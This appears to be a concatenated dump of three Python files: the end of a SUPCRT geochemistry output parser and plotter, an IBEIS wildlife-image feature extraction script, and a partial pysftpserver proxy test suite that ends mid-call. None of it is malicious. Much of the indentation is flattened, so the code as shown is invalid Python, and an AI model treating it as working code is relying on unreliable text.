        max_temp = input('Input the Maximum Temperature: ')
        max_press = input('Input the Maximum Pressure: ')
max_temp = float(max_temp)
max_press = float(max_press)
if customFile != None:
file_Path = op.dirname(op.abspath(os.getcwd()))+ '\\' + customFile
elif len(self.supcrtFile) ==0:
raise ValueError("You haven't run SUPCRT yet")
else:
filename = self.supcrtFile
            filePath = '/'.join(('resources', filename))
            file_Path = pkg_resources.resource_filename(resource_package, filePath)
with open(file_Path, 'r') as f:
impor = f.read()
import_data = impor.replace('\t', ' ')
split = import_data.split('\n')
for i in range(len(split)):
try:
if 'REACTION TITLE' in split[i]:
returnVar = " ".join(split[i+1].split()).split(' ')[0]
elif '************************************ REACTION' in split[i]:
returnVar = " ".join(split[i+4].split()).split(' ')[0]
except:
continue
if 'STANDARD STATE PROPERTIES OF THE REACTION AT ELEVATED TEMPERATURES AND PRESSURES' in split[i]:
subLst = []
temp = []
pres = []
DH2 = []
lgK = []
dlG = []
dlH = []
dlS = []
dlV = []
dlCp = []
subDict = {}
for item in split[(i+7):]:
try:
if len(item) > 0:
subLst = (" ".join(item.split())).split(' ')
temp.append(subLst[0])
pres.append(subLst[1])
DH2.append(subLst[2])
lgK.append(subLst[3])
dlG.append(subLst[4])
dlH.append(subLst[5])
dlS.append(subLst[6])
dlV.append(subLst[7])
dlCp.append(subLst[8])
if float(subLst[0]) == max_temp and float(subLst[1]) == max_press:
break
except:
continue
subDict['Temperature'] = [float(i) for i in temp]
subDict['Pressure'] = [float(i) for i in pres]
subDict['DH2O'] = [float(i) for i in DH2]
subDict['LogK'] = [float(i) for i in lgK]
subDict['delG'] = [float(i) for i in dlG]
subDict['delH'] = [float(i) for i in dlH]
subDict['delS'] = [float(i) for i in dlS]
storeLst = []
            for i in dlV:
                if i == '*********' or i == 'NaN':
                    storeLst.append(0)
                else:
                    storeLst.append(float(i))
subDict['delV'] = storeLst
subDict['delCp'] = [float(i) for i in dlCp]
returnLst[returnVar] = subDict
self.supcrtOut = returnLst
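    # After calculate_supcrt (or calculate_supcrt_special) runs, self.supcrtOut maps each
    # reaction title to a dict of parallel lists keyed by 'Temperature', 'Pressure',
    # 'DH2O', 'LogK', 'delG', 'delH', 'delS', 'delV', and 'delCp'; this is the structure
    # make_supcrt_plots iterates over below.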
def make_supcrt_plots(self):
        '''Creates plots of LogK, delG, and delV for already-calculated SUPCRT results, mirroring the set of plots the DEW model produces.'''
for i in self.supcrtOut:
plt.figure()
plt.plot(self.supcrtOut[i]['Temperature'], self.supcrtOut[i]['LogK'])
plt.title('LogK vs. Temp for ' + i)
plt.xlabel('Temp, Deg C')
plt.ylabel('LogK')
plt.show()
plt.figure()
plt.plot(self.supcrtOut[i]['Pressure'], self.supcrtOut[i]['LogK'])
plt.title('LogK vs. Pressure for ' + i)
plt.ylabel('LogK')
plt.xlabel('Pressure (Kb)')
plt.show()
for i in self.supcrtOut:
plt.figure()
plt.plot(self.supcrtOut[i]['Temperature'], self.supcrtOut[i]['delG'])
            plt.title('delG vs. Temp for ' + i)
plt.xlabel('Temp, Deg C')
plt.ylabel('delG')
plt.show()
plt.figure()
plt.plot(self.supcrtOut[i]['Pressure'], self.supcrtOut[i]['delG'])
            plt.title('delG vs. Pressure for ' + i)
plt.ylabel('delG')
plt.xlabel('Pressure (Kb)')
plt.show()
for i in self.supcrtOut:
plt.figure()
plt.plot(self.supcrtOut[i]['Temperature'], self.supcrtOut[i]['delV'])
plt.title('delV vs. Temp for ' + i)
plt.xlabel('Temp, Deg C')
plt.ylabel('delV')
plt.show()
plt.figure()
plt.plot(self.supcrtOut[i]['Pressure'], self.supcrtOut[i]['delV'])
            plt.title('delV vs. Pressure for ' + i)
plt.ylabel('delV')
plt.xlabel('Pressure (Kb)')
plt.show()
|
BuildConsolidatedFeaturesFile.py
|
# python-3
# coding: utf-8
'''
Script Name: BuildConsolidatedFeaturesFile.py
Created date : Sunday, 27th March
Author : Sreejith Menon
Description :
buildFeatureFl(input file,output file)
Reads from a csv file (taken as a parameter) containing a list of image GIDs.
Extracts the below features from the IBEIS dataset:
1. nid
2. names
3. species_texts
4. sex_texts
5. age_months_est
6. exemplar_flags
7. quality_texts
Outputs the following files in the same directory as outFL:
File 1 : Map of all images and their annotation IDs (csv)
File 2 : Annotation ID's and their features (csv)
File 3 : Image GID, annotation ID's and their features (csv)
File 4 : Image GID, annotation ID's and their features (json)
'''
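# Hedged usage sketch (the path is illustrative): given outFL = "../data/full1.csv",
# buildFeatureFl writes full1_gid_aid_map.json, full1_aid_features.json and
# full1_gid_aid_features.json alongside it; see buildFeatureFl below.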
from __future__ import print_function
import GetPropertiesAPI as GP
import importlib, json, re, sys, csv, time, math
# importlib.reload(GP) # un-comment if there are any changes made to API
import pandas as pd
# import DataStructsHelperAPI as DS
from math import floor
# importlib.reload(GP)
from multiprocessing import Process
import DataStructsHelperAPI as DS
def printCompltnPercent(percentComplete):
i = int(percentComplete)
sys.stdout.write('\r')
# the exact output you're looking for:
sys.stdout.write("[%-100s] %d%%" % ('=' * i, i))
sys.stdout.flush()
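# e.g. printCompltnPercent(42) redraws the current console line as a 100-character
# progress bar containing 42 '=' characters, followed by "42%".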
def writeCsvFromDict(header, inDict, outFL):
writeFL = open(outFL, 'w')
writer = csv.writer(writeFL)
writer.writerow(header)
for key in inDict.keys():
if inDict[key] == None:
value = ["NONE"]
else:
value = inDict[key]
writer.writerow([key] + value)
writeFL.close()
def buildExifFeatureFl(inp, outFL, isInpFl=True):
if isInpFl:
with open(inp, "r") as inpFL:
gids = [row[0] for row in csv.reader(inpFL)]
else: # input is provided as a list
gids = inp
gids = list(map(lambda x: int(x), gids))
datetimes = GP.getExifData(gids, 'unixtime')
lats = GP.getExifData(gids, 'lat')
longs = GP.getExifData(gids, 'lon')
width = GP.getExifData(gids, 'width')
height = GP.getExifData(gids, 'height')
orientation = GP.getExifData(gids, 'orientation')
size = GP.getExifData(gids, 'size')
imgProps = {gids[i]: {'datetime': GP.getUnixTimeReadableFmt(datetimes[i]),
'lat': lats[i],
'long': longs[i],
'width': width[i],
'height': height[i],
'orientation': orientation[i],
'size': size[i]
}
for i in range(0, len(gids))}
with open(outFL, "w") as outFl:
json.dump(imgProps, outFl, indent=4)
return None
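# Hedged usage sketch (GIDs and path are illustrative):
#   buildExifFeatureFl([1, 2, 3], "../data/imgs_exif_sample.json", isInpFl=False)
# writes a JSON keyed by GID with datetime, lat, long, width, height, orientation
# and size for each image.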
def buildBeautyFtrFl(inpFl, ftrs, outFlPrefix):
    df = pd.read_csv(inpFl, index_col=0).transpose().reset_index()  # DataFrame.from_csv was removed from pandas
df['index'] = df['index'].apply(lambda x: floor(float(x)))
df.columns = ftrs
df['GID'] = df['GID'].apply(lambda x: str(int(x)))
df.to_csv(str(outFlPrefix + ".csv"), index=False)
df.index = df['GID']
    df.drop(columns=['GID'], inplace=True)
dctObj = df.to_dict(orient='index')
with open(str(outFlPrefix + ".json"), "w") as jsonObj:
json.dump(dctObj, jsonObj, indent=4)
return None
# Original Microsoft Tagging API output is a R list,
# This method parses the data into python readable form and dumps the output into a JSON.
def genJsonFromMSAIData(flName, outFlNm):
data = []
with open(flName) as openFl:
for row in openFl:
data.append(row)
cleanData = []
for row in data:
cleanData.append(row.replace("\\", "").replace('"\n', ""))
apiResultsDict = {}
for i in range(1, len(cleanData)):
key, value = cleanData[i].split("\t")
value = value.replace('"{"tags"', '{"tags"')
key = key.replace('"', '')
apiResultsDict[key] = json.loads(value)
json.dump(apiResultsDict, open(outFlNm, "w"), indent=4)
return None
def getAdditionalAnnotFeatures(gidAidMap, ftrName, outFlNm='/tmp/getAdditionalAnnotFeatures.dump.json'):
with open(gidAidMap, "r") as gidAidMapFl:
gidAidJson = json.load(gidAidMapFl)
additionalFtrDct = {}
gidInd = 0
n = len(gidAidJson.keys())
for gid in gidAidJson.keys():
additionalFtrDct[gid] = additionalFtrDct.get(gid, []) + [GP.getImageFeature(gidAidJson[gid][0], ftrName)][0]
gidInd += 1
percentComplete = gidInd * 100 / n
if math.floor(percentComplete) % 5 == 0:
printCompltnPercent(percentComplete)
with open(outFlNm, "w") as outFlObj:
json.dump(additionalFtrDct, outFlObj, indent=4)
return None
'''
Logic for reading data from the consolidatedHITResults file - changed
The input for the below method will be a csv file/list with all the image GID's for which the features have to be extracted.
'''
def buildFeatureFl(inp, outFL, isInpFl=True):
allGID = []
if isInpFl:
reader = csv.reader(open(inp, "r"))
for row in reader:
            allGID.append(row[0])  # keep only the GID column, as in buildExifFeatureFl
else: # input is provided as a list
allGID = inp
# aids = GP.getAnnotID(allGID)
# Extracts all the annotation ID's from IBEIS
# GidAidMap = {allGID[i] : aids[i] for i in range(0,len(allGID))}
gidInd = 0
GidAidMap = {}
for gid in allGID:
aid = GP.getAnnotID(int(gid))
GidAidMap[gid] = [aid]
gidInd += 1
percentComplete = gidInd * 100 / len(allGID)
if math.floor(percentComplete) % 5 == 0:
printCompltnPercent(percentComplete)
print()
print("Extracted all annotation ID's for selected images.")
# filter out all the non-NONE annotation ids
aidList = []
for gid in GidAidMap.keys():
for aid in filter(lambda x: x != None, GidAidMap[gid]):
aidList = aidList + aid
# Extracts all feature info based on annotation ID's from IBEIS
features = {}
print("Features to be extracted for %d annotation IDs" % len(aidList))
nids = GP.getImageFeature(aidList, "name/rowid")
names = GP.getImageFeature(aidList, "name/text")
species_texts = GP.getImageFeature(aidList, "species/text")
sex_texts = GP.getImageFeature(aidList, "sex/text")
age_months = GP.getImageFeature(aidList, "age/months")
exemplar_flags = GP.getImageFeature(aidList, "exemplar")
quality_texts = GP.getImageFeature(aidList, "quality/text")
yaw_texts = GP.getImageFeature(aidList, "yaw/text")
image_contrib_tags = GP.getImageFeature(aidList, "image/contributor/tag")
features = {aidList[i]: {'nid': nids[i], "name": names[i], "species": species_texts[i], "sex": sex_texts[i],
'age': GP.getAgeFeatureReadableFmt(age_months[i]), 'exemplar': str(exemplar_flags[i]),
'quality': quality_texts[i], 'yaw': yaw_texts[i], 'contributor': image_contrib_tags[i]}
for i in range(0, len(aidList))}
print()
print("All features extracted.")
# Build the all combined file
GidAidFeatures = {}
for gid in GidAidMap.keys():
if GidAidMap[gid][0] == None:
GidAidFeatures[gid] = None
else:
GidAidFeatures[gid] = []
for aid in GidAidMap.get(gid)[0]:
newAidFeatures = {}
newAidFeatures[aid] = features[aid]
GidAidFeatures[gid].append(newAidFeatures)
writeFLTitle, writeFLExt = outFL.split('.csv')
writeFLExt = 'csv'
writeFLGidAidFl = writeFLTitle + "_gid_aid_map." + writeFLExt
writeFLAidFeatureFl = writeFLTitle + "_aid_features." + writeFLExt
writeFLGidAidFeatureFl = writeFLTitle + "_gid_aid_features." + writeFLExt
# Snippet for writing image GID - annotation ID map to a csv file
# head = ['GID','ANNOTATION_ID']
# writeCsvFromDict(head,GidAidMap,writeFLGidAidFl)
# head = ['ANNOTATION_ID','NID','NAME','SPECIES','SEX','AGE_MONTHS','EXEMPLAR_FLAG','IMAGE_QUALITY','IMAGE_YAW']
# writeCsvFromDict(head,features,writeFLAidFeatureFl)
# head = ['GID','ANNOTATION_ID','FEATURES']
# writeCsvFromDict(head,GidAidFeatures,writeFLGidAidFeatureFl)
outFL = open((writeFLTitle + "_gid_aid_map.json"), "w")
json.dump(GidAidMap, outFL, indent=4)
outFL.close()
outFL = open((writeFLTitle + "_aid_features.json"), "w")
json.dump(features, outFL, indent=4)
outFL.close()
outFL = open((writeFLTitle + "_gid_aid_features.json"), "w")
json.dump(GidAidFeatures, outFL, indent=4)
outFL.close()
print("Script completed.")
# these APIs require encoded annot_uuid_list
ggr_eco_ftr_api_map = {'age': "/api/annot/age/months/json",
'sex': "/api/annot/sex/text/json",
'bbox': "/api/annot/bbox/json",
'nid': "/api/annot/name/rowid/json",
'exemplar': "/api/annot/exemplar/json",
'species': "/api/annot/species/json",
'quality': "/api/annot/quality/text/json",
'view_point': "/api/annot/yaw/text/json"
}
# these APIs takes in an encoded gid list
ggr_otr_ftr_api_map = {'contributor': "/api/image/note",
'lat': "/api/image/lat",
'long': "/api/image/lon",
'datetime': "/api/image/unixtime",
'width': "/api/image/width",
'height': "/api/image/height",
'orientation': "/api/image/orientation"
}
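# Both maps are consumed via GP.ggr_get, e.g. (mirroring the calls below):
#   lat = GP.ggr_get(ggr_otr_ftr_api_map['lat'], GP.ggr_gid_form_arg(gid))['results'][0]
# The annot-level endpoints take GP.ggr_annot_form_arg(annot_uuid) instead.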
def check_time_elapsed(start_time):
    # call sites report progress in 100-second intervals, so check against 100 s
    return time.time() - start_time >= 100.0
def build_feature_file_ggr(in_file, out_fl_head, start_count, end_count):
with open(in_file, "r") as in_fl:
img_uuids = list(json.load(in_fl).keys())
# img_uuids = [re.findall(r'(.*).jpg', uuid)[0] for uuid in img_uuids][start_count:end_count+1] # extract the filename without the extension
img_uuids = [uuid for uuid in img_uuids][start_count:end_count + 1]
print("Starting extract: %i to %i" % (start_count, end_count))
start_time = time.time()
uuid_annot_uuid_map = {}
for img_uuid in img_uuids:
uuid_dict = GP.ggr_get("/api/image/annot/uuid/json", GP.ggr_image_form_arg(img_uuid))
if len(uuid_dict['results'][0]) == 0: # case 1: has no annotation
uuid_annot_uuid_map[img_uuid] = [None]
else: # case 2, has 1 or more annot
for annot_dict in uuid_dict['results'][0]:
uuid_annot_uuid_map[img_uuid] = uuid_annot_uuid_map.get(img_uuid, []) + [annot_dict["__UUID__"]]
# elapsed time check
if check_time_elapsed(start_time):
start_time = time.time()
print("100 seconds elapsed..!")
print("Annotation UUIDs extracted")
# logic to flatten out the list of lists
aid_uuid_list = [item for sublist in list(uuid_annot_uuid_map.values()) for item in sublist if item]
start_time = time.time()
aid_uuid_feature_map = {}
for aid in aid_uuid_list:
species = GP.ggr_get(ggr_eco_ftr_api_map['species'], GP.ggr_annot_form_arg(aid))['results'][0]
sex = GP.ggr_get(ggr_eco_ftr_api_map['sex'], GP.ggr_annot_form_arg(aid))['results'][0]
age = GP.getAgeFeatureReadableFmt(
GP.ggr_get(ggr_eco_ftr_api_map['age'], GP.ggr_annot_form_arg(aid))['results'][0])
bbox = GP.ggr_get(ggr_eco_ftr_api_map['bbox'], GP.ggr_annot_form_arg(aid))['results'][0]
exemplar = GP.ggr_get(ggr_eco_ftr_api_map['exemplar'], GP.ggr_annot_form_arg(aid))['results'][0]
nid = GP.ggr_get(ggr_eco_ftr_api_map['nid'], GP.ggr_annot_form_arg(aid))['results'][0]
quality = GP.ggr_get(ggr_eco_ftr_api_map['quality'], GP.ggr_annot_form_arg(aid))['results'][0]
view_point = GP.ggr_get(ggr_eco_ftr_api_map['view_point'], GP.ggr_annot_form_arg(aid))['results'][0]
aid_uuid_feature_map[aid] = dict(sex=sex, age=age, bbox=bbox, exemplar=exemplar, nid=nid, species=species,
view_point=view_point, quality=quality)
if check_time_elapsed(start_time):
start_time = time.time()
print("100 seconds elapsed..!")
print("Feature extraction completed..!")
uuid_annot_uuid_map_fl_nm = out_fl_head + "_uuid_annot_uuid_map.json"
with open(uuid_annot_uuid_map_fl_nm, "w") as uuid_annot_uuid_map_fl:
json.dump(uuid_annot_uuid_map, uuid_annot_uuid_map_fl, indent=4)
annot_uuid_ftr_map_fl_nm = out_fl_head + "_annot_uuid_ftr_map.json"
with open(annot_uuid_ftr_map_fl_nm, "w") as annot_uuid_ftr_map_fl:
json.dump(aid_uuid_feature_map, annot_uuid_ftr_map_fl, indent=4)
return 0
def build_exif_ftrs_fl_ggr(in_file_uuid_gid_map, in_file_uuid_list, out_fl, start, end):
with open(in_file_uuid_gid_map, "r") as in_map_fl:
uuid_gid_map = json.load(in_map_fl)
with open(in_file_uuid_list, "r") as in_list_fl:
uuid_list = in_list_fl.read().split("\n")[start:end + 1]
start_time = time.time()
gid_uuid_exif_ftr_map = {}
for uuid in uuid_list:
gid = uuid_gid_map[uuid]
lat = GP.ggr_get(ggr_otr_ftr_api_map['lat'], GP.ggr_gid_form_arg(gid))['results'][0]
long = GP.ggr_get(ggr_otr_ftr_api_map['long'], GP.ggr_gid_form_arg(gid))['results'][0]
datetime = GP.getUnixTimeReadableFmt(
GP.ggr_get(ggr_otr_ftr_api_map['datetime'], GP.ggr_gid_form_arg(gid))['results'][0])
contributor = GP.ggr_get(ggr_otr_ftr_api_map['contributor'], GP.ggr_gid_form_arg(gid))['results'][0]
height = GP.ggr_get(ggr_otr_ftr_api_map['height'], GP.ggr_gid_form_arg(gid))['results'][0]
width = GP.ggr_get(ggr_otr_ftr_api_map['width'], GP.ggr_gid_form_arg(gid))['results'][0]
orientation = GP.ggr_get(ggr_otr_ftr_api_map['orientation'], GP.ggr_gid_form_arg(gid))['results'][0]
gid_uuid_exif_ftr_map[uuid] = dict(lat=lat, long=long, datetime=datetime, contributor=contributor,
height=height, width=width, orientation=orientation)
if check_time_elapsed(start_time):
start_time = time.time()
print("100 seconds elapsed..!")
with open(out_fl, "w") as uuid_exif_ftr_fl:
json.dump(gid_uuid_exif_ftr_map, uuid_exif_ftr_fl, indent=4)
return 0
def build_reqd_ftrs():
return 0
def __main__():
allGidPart1 = list(map(str, list(range(1, 5000))))
print("Starting feature extraction for GIDs . . .Part1")
buildFeatureFl(allGidPart1, "../data/full1.csv", False)
print("Completed feature extraction . . .Part1")
print("Starting EXIF feature extraction for GIDs . . .Part1")
buildExifFeatureFl(allGidPart1, "../data/imgs_exif_data_full1.json", False)
print("Completed EXIF feature extraction . . .Part1")
allGidPart2 = list(map(str, list(range(5000, 9407))))
print("Starting feature extraction for GIDs . . .Part2")
buildFeatureFl(allGidPart2, "../data/full2.csv", False)
print("Completed feature extraction . . .Part2")
print("Starting EXIF feature extraction for GIDs . . .Part2")
buildExifFeatureFl(allGidPart2, "../data/imgs_exif_data_full2.json", False)
print("Completed EXIF feature extraction . . .Part2")
print("Combining part files to full files")
DS.combineJson("../data/full1_gid_aid_map.json", "../data/full2_gid_aid_map.json", "../data/full_gid_aid_map.json")
DS.combineJson("../data/full1_gid_aid_features.json", "../data/full2_gid_aid_features.json",
"../data/full_gid_aid_features.json")
DS.combineJson("../data/full1_aid_features.json", "../data/full2_aid_features.json",
"../data/full_aid_features.json")
DS.combineJson("../data/imgs_exif_data_full1.json", "../data/imgs_exif_data_full2.json",
"../data/imgs_exif_data_full.json")
def test(start, end, out):
inExifFl, inGidAidMapFl, inAidFtrFl = "../data/ggr_gid_uuid_exif_ftr_map.json", "../data/ggr_uuid_annot_uuid_map.json", "../data/ggr_annot_uuid_ftr_map.json"
with open(inGidAidMapFl, "r") as fl:
obj = json.load(fl)
with open(inAidFtrFl, "r") as fl:
obj2 = json.load(fl)
no_ftr_annots = []
for uuid in obj:
        if obj[uuid][0] is not None:  # there is at least one aid
for annot_id in obj[uuid]:
# check if annot_id in ftr file
if annot_id not in obj2.keys():
no_ftr_annots.append(annot_id)
print(len(no_ftr_annots))
aid_uuid_feature_map = {}
for aid in no_ftr_annots[start:end]:
species = GP.ggr_get(ggr_eco_ftr_api_map['species'], GP.ggr_annot_form_arg(aid))['results'][0]
sex = GP.ggr_get(ggr_eco_ftr_api_map['sex'], GP.ggr_annot_form_arg(aid))['results'][0]
age = GP.getAgeFeatureReadableFmt(
GP.ggr_get(ggr_eco_ftr_api_map['age'], GP.ggr_annot_form_arg(aid))['results'][0])
bbox = GP.ggr_get(ggr_eco_ftr_api_map['bbox'], GP.ggr_annot_form_arg(aid))['results'][0]
exemplar = GP.ggr_get(ggr_eco_ftr_api_map['exemplar'], GP.ggr_annot_form_arg(aid))['results'][0]
nid = GP.ggr_get(ggr_eco_ftr_api_map['nid'], GP.ggr_annot_form_arg(aid))['results'][0]
quality = GP.ggr_get(ggr_eco_ftr_api_map['quality'], GP.ggr_annot_form_arg(aid))['results'][0]
view_point = GP.ggr_get(ggr_eco_ftr_api_map['view_point'], GP.ggr_annot_form_arg(aid))['results'][0]
aid_uuid_feature_map[aid] = dict(sex=sex, age=age, bbox=bbox, exemplar=exemplar, nid=nid, species=species,
view_point=view_point, quality=quality)
with open(out, "w") as fl:
json.dump(aid_uuid_feature_map, fl, indent=4)
if __name__ == "__main__":
gids = list(map(str, list(range(1, 1862))))
buildFeatureFl(gids, "../data/Flickr_IBEIS_Giraffe_Ftrs.csv", False)
# __main__()
# gidAidMapFl = "../data/full_gid_aid_map.json"
# getAdditionalAnnotFeatures(gidAidMapFl,'bbox',"../data/gid_bbox.json")
# buildBeautyFtrFl("../data/beautyFeatures_GZC_R.csv",['GID','pleasure','arousal','dominance','y'],"../data/beautyFeatures_GZC")
# DS.combineJson("../data/beautyFeatures_GZC.json","../data/imgs_exif_data_full.json","../data/GZC_exifs_beauty_full.json")
# p1 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_1.json",1,5000))
# p2 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_2.json",5001,10000))
# p3 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_3.json",10001,15000))
# p4 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_4.json",15001,20000))
# p5 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_5.json",20001,25000))
# p6 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_6.json",25001,30000))
# p7 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_7.json",30001,35000))
# p8 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_8.json",35001,37433))
# p9 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_1",1,5000))
# p10 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_2",5001,10000))
# p11 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_3",10001,15000))
# p12 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_4",15001,20000))
# p13 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_5",20001,25000))
# p14 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_6",25001,30000))
# p15 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_7",30001,35000))
# p16 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_8",35001,37433))
# p1 = Process(target=test, args=(0, 400, "/tmp/test1.json"))
# p2 = Process(target=test, args=(400, 800, "/tmp/test2.json"))
# p3 = Process(target=test, args=(800, 1200, "/tmp/test3.json"))
# p4 = Process(target=test, args=(1200, 1600, "/tmp/test4.json"))
# p5 = Process(target=test, args=(1600, 2000, "/tmp/test5.json"))
# p6 = Process(target=test, args=(2000, 2400, "/tmp/test6.json"))
# p7 = Process(target=test, args=(2400, 2800, "/tmp/test7.json"))
# p8 = Process(target=test, args=(2800, 3200, "/tmp/test8.json"))
# p9 = Process(target=test, args=(3200, 3600, "/tmp/test9.json"))
# p10 = Process(target=test, args=(3600, 4033, "/tmp/test10.json"))
# p1.start()
# p2.start()
# p3.start()
# p4.start()
# p5.start()
# p6.start()
# p7.start()
# p8.start()
# p9.start()
# p10.start()
# # p11.start()
# # p12.start()
# # p13.start()
# # p14.start()
# # p15.start()
# # p16.start()
|
test_server_proxy.py
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
import threading
import logging
import socket
import select
import paramiko
import os
import unittest
import stat
from shutil import rmtree
from pysftpserver.tests.stub_sftp import StubServer, StubSFTPServer
from pysftpserver.tests.utils import *
from pysftpserver.server import *
from pysftpserver.proxystorage import SFTPServerProxyStorage
REMOTE_ROOT = t_path("server_root")
LOCAL_ROOT = t_path("local_folder")
remote_file = lambda file_path: os.path.join(REMOTE_ROOT, file_path)
event = threading.Event()
# attach existing loggers (use --nologcapture option to see output)
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s'
)
def _start_sftp_server():
"""Start the SFTP local server."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setblocking(0)
sock.bind(('localhost', 2223))
sock.listen(10)
reads = {sock}
others = set()
while not event.is_set():
ready_to_read, _, _ = \
select.select(
reads,
others,
others,
1)
if sock in ready_to_read:
client_socket, address = sock.accept()
ts = paramiko.Transport(client_socket)
host_key = paramiko.RSAKey.from_private_key_file(
t_path('server_id_rsa')
)
ts.add_server_key(host_key)
server = StubServer()
ts.set_subsystem_handler(
'sftp', paramiko.SFTPServer, StubSFTPServer)
ts.start_server(server=server)
sock.close()
def setup_module():
"""Setup in a new thread the SFTP local server."""
os.chdir(t_path())
os.mkdir(REMOTE_ROOT)
t = threading.Thread(target=_start_sftp_server, name="server")
t.start()
def teardown_module():
"""Stop the SFTP server by setting its event.
Clean remaining directories (in case of failures).
"""
event.set()
rmtree(REMOTE_ROOT, ignore_errors=True)
class TestProxyServer(unittest.TestCase):
@classmethod
def setup_class(cls):
os.mkdir(LOCAL_ROOT)
os.chdir(LOCAL_ROOT)
def setUp(self):
"""Before running each test, create a server instance and create the required directories."""
self.server = SFTPServer(
SFTPServerProxyStorage(
"test:secret@localhost",
port=2223
),
logfile=t_path('log'),
raise_on_error=True
)
def test_mkdir(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_MKDIR, sftpstring(b'foo'), sftpint(0))
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_MKDIR, sftpstring(b'foo'), sftpint(0))
self.assertRaises(SFTPException, self.server.process)
self.assertTrue(os.path.exists(remote_file("foo")) and os.path.isdir(remote_file("foo")))
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_RMDIR, sftpstring(b'foo')
)
self.server.process()
self.assertFalse(os.path.exists(remote_file("foo")))
def test_stat(self):
with open("/etc/services") as f:
with open(remote_file("services"), 'a') as f_bis:
f_bis.write(f.read())
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_STAT,
sftpstring(b'services')
)
self.server.process()
stat = get_sftpstat(self.server.output_queue)
self.assertEqual(stat['size'], os.path.getsize("/etc/services"))
self.assertEqual(stat['uid'], os.getuid())
os.unlink(remote_file("services"))
def test_lstat(self):
os.symlink("foo", remote_file("link"))
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_LSTAT,
sftpstring(b'link')
)
self.server.process()
stat = get_sftpstat(self.server.output_queue)
self.assertEqual(stat['size'], len("foo"))
self.assertEqual(stat['uid'], os.getuid())
os.unlink(remote_file("link"))
def test_fstat(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_READ | SSH2_FXF_WRITE | SSH2_FXF_CREAT),
sftpint(0)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_FSTAT,
sftpstring(handle)
)
self.server.process()
stat = get_sftpstat(self.server.output_queue)
self.assertEqual(stat['size'], 0)
self.assertEqual(stat['uid'], os.getuid())
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
os.unlink(remote_file("services"))
def test_setstat(self):
atime = 1415626110
mtime = 1415626120
size = 10 ** 2
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
            sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE | SSH2_FXF_READ),  # FXF_READ is the open flag; FXP_READ is a packet type
sftpint(0)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
etc_services = open('/etc/services', 'rb').read()
self.server.input_queue = sftpcmd(
SSH2_FXP_WRITE,
sftpstring(handle),
sftpint64(0),
sftpstring(etc_services)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_SETSTAT,
sftpstring(b'services'),
sftpint(
SSH2_FILEXFER_ATTR_SIZE |
SSH2_FILEXFER_ATTR_PERMISSIONS |
SSH2_FILEXFER_ATTR_ACMODTIME
),
sftpint64(size), # 100 bytes
sftpint(33152), # 0o100600
sftpint(atime),
sftpint(mtime)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
self.assertEqual(
0o600,
stat.S_IMODE(os.lstat(remote_file('services')).st_mode))
self.assertEqual(
atime,
os.lstat(remote_file('services')).st_atime)
self.assertEqual(
mtime,
os.lstat(remote_file('services')).st_mtime)
self.assertEqual(
size,
os.lstat(remote_file('services')).st_size)
os.unlink(remote_file('services'))
def test_fsetstat(self):
atime = 1415626110
mtime = 1415626120
size = 10 ** 2
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE),
sftpint(0)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
etc_services = open('/etc/services', 'rb').read()
self.server.input_queue = sftpcmd(
SSH2_FXP_WRITE,
sftpstring(handle),
sftpint64(0),
sftpstring(etc_services)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_FSETSTAT,
sftpstring(handle),
